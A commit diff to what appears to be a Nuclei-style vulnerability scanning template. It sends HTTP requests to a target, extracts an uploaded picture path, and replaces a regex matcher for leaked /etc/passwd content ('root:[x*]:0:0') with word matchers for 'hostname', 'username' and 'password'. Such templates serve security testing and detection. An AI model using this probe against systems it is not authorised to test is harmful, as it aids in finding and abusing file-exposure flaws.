matcher update

patch-1
sandeep 2021-02-25 18:29:49 +05:30
parent 277f7c21d6
commit 1dbd3b082b
1 changed files with 10 additions and 3 deletions

View File

@ -15,6 +15,7 @@ requests:
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0
Content-Length: 5
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: deflate
"1":1
- |
@ -22,11 +23,13 @@ requests:
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0
Accept-Encoding: gzip
Accept-Encoding: deflate
- |
GET {{endpoint}} HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0
Accept-Encoding: deflate
extractors:
- type: regex
@ -37,7 +40,11 @@ requests:
- '/public/uploads/picture/(.*.jpg)'
matchers:
- type: regex
regex:
- "root:[x*]:0:0"
- type: word
words:
- php
- hostname
- username
- password
condition: and
part: body